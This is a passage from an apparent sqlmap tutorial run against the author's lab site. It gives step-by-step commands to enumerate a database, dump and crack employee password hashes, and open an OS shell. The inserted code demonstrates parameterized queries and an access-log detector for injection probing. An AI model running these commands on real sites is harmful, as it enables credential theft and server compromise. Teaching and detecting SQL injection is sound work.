
The result is shown below. It gives some important information about the vulnerable website, such as the web application technology and the back-end DBMS.
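The about.php?id=1 parameter is injectable because the value taken from the query string ends up spliced into the SQL text, and that is the single weakness every sqlmap command in this post drives. The following added example (not code from the post or from sqlmap) shows that pattern beside the parameterized form, using an in-memory SQLite table standing in for the post's shunya.employees table; the rows, function names and placeholder hashes are assumed for illustration.

```python
import sqlite3

# Constructed rows standing in for the employees table of the post's 'shunya' database
# (sample data, not the post's own). Password values are placeholder strings.
SAMPLE_ROWS = [
    (1, "alice", "<hash-placeholder-1>"),
    (2, "bob", "<hash-placeholder-2>"),
    (3, "carol", "<hash-placeholder-3>"),
]


def make_db():
    """Create an in-memory SQLite database with an employees(id, username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, user_input):
    """The about.php?id=... pattern: the raw query-string value is pasted into the SQL text.

    Whatever the client sends becomes part of the statement, which is exactly what
    sqlmap relies on to enumerate the whole DBMS through this one parameter.
    """
    query = f"SELECT id, username FROM employees WHERE id = {user_input}"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_input):
    """Parameterized form: the value is bound separately from the SQL text.

    The driver never re-parses the bound value as SQL, so '1 OR 1=1' is compared against
    the id column as an ordinary, non-matching string instead of widening the WHERE clause.
    """
    return conn.execute(
        "SELECT id, username FROM employees WHERE id = ?", (user_input,)
    ).fetchall()


def parse_id(user_input):
    """Input validation to apply on top of binding: an id must be a plain positive integer."""
    if not user_input.isdigit():
        raise ValueError(f"invalid id: {user_input!r}")
    return int(user_input)


def demo():
    """Run both lookups with a normal id and with a boolean-based probe of the kind sqlmap sends."""
    conn = make_db()
    tampered = "1 OR 1=1"
    return {
        "vulnerable_normal": vulnerable_lookup(conn, "1"),
        "vulnerable_tampered": vulnerable_lookup(conn, tampered),
        "safe_normal": safe_lookup(conn, "1"),
        "safe_tampered": safe_lookup(conn, tampered),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable lookup returns every row for the tampered input, while the parameterized one returns nothing; combining binding with the strict parse_id check also rejects the tampered value before it reaches the database at all.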

Now let’s fingerprint the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -f

It will fingerprint the database as shown below.

Now let’s get the banner of the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -b as shown below.

We can see the banner as shown below.

Now let’s find out who the current user of the database is. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --current-user as shown below.

We can see the result below.

Let’s find out the hostname of the web server. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --hostname as shown below.

We can see the hostname as shown below.

Now let’s find out the name of the current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --current-db

We will get the name of the current database as shown below. Here our database’s name is ‘shunya’.

Now we will enumerate all the users of the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --users

We can see all the users of the database as shown below.

Now let’s see if we can get any passwords of the DBMS users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --passwords as shown below.

We can see below that we got the password hash for only one user, because I have set a password for only one user.

Now let’s see the privileges of these users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --privileges as shown below.

We can see the privileges of users as shown below.

Now let’s see the roles of the DBMS users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --roles

The result is as shown below.

Now let’s see all the databases. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --dbs

The result shows a list of databases present, as shown below.

Now let’s get the list of all tables present. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --tables

We get the list of tables, grouped by their respective databases.

Similarly, we can get the list of all the columns. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --columns

The result is below.

Suppose we want to retrieve the number of entries in the tables of the current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --count

The result is below.

Now let’s dump all the entries in the tables of the current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --dump

The command dumps the entries of every table in the current database, as shown below.

If you want to dump the fields of all the databases, you can use the command sqlmap.py -u www.shunya.com/about.php?id=1 --dump-all

OK, now let’s look at a specific database of interest. Let’s find the tables present in the database shunya. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya --tables as shown below.

We can see the results as shown below.

Now let’s find out the columns in the table ‘employees’. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya -T employees --columns as shown below.

We get the column names as shown below.

Now let’s dump the columns “id,username,password”. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya -T employees -C id,username,password --dump

The result is as below. We can see the password hashes and usernames.

When sqlmap recognizes hashes in the password field, it will ask you whether you want it to crack the hashes automatically using a dictionary-based attack. When you select “yes”, it will crack the hashes as shown below.


We can even get shell access using sqlmap. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 --os-shell as shown below.

It will prompt us to select the web application language used by the web server. We already know the web application language is PHP.

It will automatically try to retrieve the root directory of the web server and directly give access to a shell as shown below. In my case it somehow failed.

We are inside the shell. Type “dir” to see the contents of the root directory.
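Every command above drives the same single parameter with many crafted requests, which is also what makes this activity visible in the web server's access log: repeated requests to about.php from one client carrying quotes, boolean tests, UNION SELECT payloads, time-delay functions, or sqlmap's default User-Agent. The following added example (not part of the original post or of sqlmap) parses a few constructed Apache combined-format log lines and flags clients whose requests show those markers; the log lines, IP addresses, User-Agent strings and threshold are assumed sample values.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" access-log lines for a lab host like the post's
# www.shunya.com; sample data, not the post's own logs.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /about.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:10:00:02 +0000] "GET /about.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:10:00:02 +0000] "GET /about.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:10:00:03 +0000] "GET /about.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 700 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:10:00:04 +0000] "GET /about.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:10:00:05 +0000] "GET /about.php?id=2%20AND%20SLEEP%285%29 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers checked against each URL-decoded query-string value. Each one corresponds to a
# technique the post exercises through sqlmap (error/boolean/union/time-based probing).
SQLI_MARKERS = [
    ("quote", re.compile(r"'")),
    ("boolean-test", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("time-delay", re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.I)),
    ("comment", re.compile(r"--|/\*")),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    entry = match.groupdict()
    # parse_qsl URL-decodes the values, so %27 becomes a quote and %20 a space.
    entry["params"] = parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the set of reason tags that make this request look like injection probing."""
    reasons = set()
    if "sqlmap" in entry["ua"].lower():
        reasons.add("sqlmap-ua")
    for _name, value in entry["params"]:
        for tag, pattern in SQLI_MARKERS:
            if pattern.search(value):
                reasons.add(tag)
    return reasons


def analyze(log_text):
    """Aggregate per client IP: total requests, suspicious requests, and the reasons seen."""
    per_ip = defaultdict(lambda: {"requests": 0, "suspicious": 0, "reasons": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        stats = per_ip[entry["ip"]]
        stats["requests"] += 1
        reasons = classify(entry)
        if reasons:
            stats["suspicious"] += 1
            stats["reasons"] |= reasons
    return per_ip


def flag_clients(log_text, threshold=2):
    """List (ip, suspicious_count, sorted_reasons) for clients at or above the threshold."""
    return sorted(
        (ip, stats["suspicious"], sorted(stats["reasons"]))
        for ip, stats in analyze(log_text).items()
        if stats["suspicious"] >= threshold
    )


if __name__ == "__main__":
    for ip, count, reasons in flag_clients(SAMPLE_LOG):
        print(f"{ip}: {count} suspicious requests ({', '.join(reasons)})")
```

The threshold exists because a single quote in a parameter can be a legitimate typo; a run of several marked requests against the same script from one client, or any request advertising the sqlmap User-Agent, is the pattern worth alerting on. On a real deployment the same checks would be fed from the live access log rather than the embedded sample.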
